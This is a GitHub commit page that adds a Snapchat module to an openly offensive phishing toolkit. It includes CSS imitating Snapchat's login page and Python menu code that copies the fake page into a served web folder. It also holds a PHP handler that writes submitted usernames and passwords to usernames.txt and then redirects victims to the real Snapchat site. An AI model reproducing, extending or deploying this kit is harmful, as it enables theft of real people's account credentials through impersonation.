Merge pull request #6 from usama7628674/master

Snapchat_added ,

NICE ONE
This commit is contained in:
An0nUD4Y 2018-04-23 12:41:55 +05:30 committed by GitHub
commit a11aa3e33e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
15 changed files with 509 additions and 2 deletions

File diff suppressed because one or more lines are too long

Binary file not shown.

Binary file not shown.

Binary file not shown.

11
Server/www/styles/semantic.min.css vendored Normal file

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,69 @@
.snapchatFontThin {
font-family: 'HelveticaNeue-Thin', 'HelveticaNeue-Light', 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif;
}
a {
cursor: pointer;
}
#navigationMenu {
text-align: center;
padding: 1rem;
}
#navigationMenu .button {
width: 75%;
max-width: 240px;
}
#navigationMenuButton {
float: right;
}
#navigationMenuButton img {
width: 20px;
}
.ui.snapchatHeader.stackable.grid .column {
margin-top: 2rem !important;
margin-bottom: 1rem;
padding-top: 1rem !important;
padding-bottom: 1rem;
}
.snapchatHeader .logo {
width: 80px;
}
.snapchatInvertedHeader h1 {
text-align: center;
}
.snapchatInvertedHeader h1 .logo {
padding-top: .5rem;
width: 36px;
}
.snapchatBody.stackable.grid {
padding-bottom: 5rem !important;
}
.snapchatFooter.stackable.grid {
padding-top: 3rem;
padding-bottom: 4rem;
border-top: 1px solid #EEE;
}
.snapchatFooter.stackable.grid h5 {
text-transform: uppercase;
}
.snapchatFooter .column {
text-align: center;
}
@font-face {
font-family: 'Dropdown';
src: url("fonts/icons.woff");
format('truetype'), url("fonts/icons.woff");
format('woff');
font-weight: normal;
font-style: normal;
}

View File

@ -95,6 +95,8 @@ def runPhishing(social, option2):
system('cp WebPages/wordpress/*.* Server/www/')
elif social == 'Twitter':
system('cp WebPages/twitter/*.* Server/www/')
elif social == 'Snapchat':
system('cp WebPages/Snapchat_web/*.* Server/www/')
elif option2 == '1' and social == 'Instagram':
system('cp WebPages/Instagram_web/*.* Server/www/')
elif option2 == '2' and social == 'Instagram':
@ -161,7 +163,7 @@ def runPEnv():
system('clear')
print '\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, END)
exit(0)
option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
if option == '1':
loadModule('Facebook')
option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Mobile Version(mobile_mode)\n\n {0}[{1}4{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}5{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
@ -193,7 +195,11 @@ def runPEnv():
elif option == '8':
loadModule('Instagram')
option2 =raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
runPhishing('Instagram', option2)
runPhishing('Instagram', option2)
elif option == '9':
loadModule('Snapchat')
option2 = ''
runPhishing('Snapchat', option2)
else:
exit(0)

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,14 @@
<?php
$var = $_POST['username'];
$var2 = $_POST['password'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>WELCOME</title></html>";
if($myFile != $searchString) {
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
header('Location:https://accounts.snapchat.com');
}
if($myFile != $searchString) {
echo "LOGIN SUCCESSFULL";
}
exit();
?>

Binary file not shown.

Binary file not shown.

Binary file not shown.

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,69 @@
.snapchatFontThin {
font-family: 'HelveticaNeue-Thin', 'HelveticaNeue-Light', 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif;
}
a {
cursor: pointer;
}
#navigationMenu {
text-align: center;
padding: 1rem;
}
#navigationMenu .button {
width: 75%;
max-width: 240px;
}
#navigationMenuButton {
float: right;
}
#navigationMenuButton img {
width: 20px;
}
.ui.snapchatHeader.stackable.grid .column {
margin-top: 2rem !important;
margin-bottom: 1rem;
padding-top: 1rem !important;
padding-bottom: 1rem;
}
.snapchatHeader .logo {
width: 80px;
}
.snapchatInvertedHeader h1 {
text-align: center;
}
.snapchatInvertedHeader h1 .logo {
padding-top: .5rem;
width: 36px;
}
.snapchatBody.stackable.grid {
padding-bottom: 5rem !important;
}
.snapchatFooter.stackable.grid {
padding-top: 3rem;
padding-bottom: 4rem;
border-top: 1px solid #EEE;
}
.snapchatFooter.stackable.grid h5 {
text-transform: uppercase;
}
.snapchatFooter .column {
text-align: center;
}
@font-face {
font-family: 'Dropdown';
src: url("fonts/icons.woff");
format('truetype'), url("fonts/icons.woff");
format('woff');
font-weight: normal;
font-style: normal;
}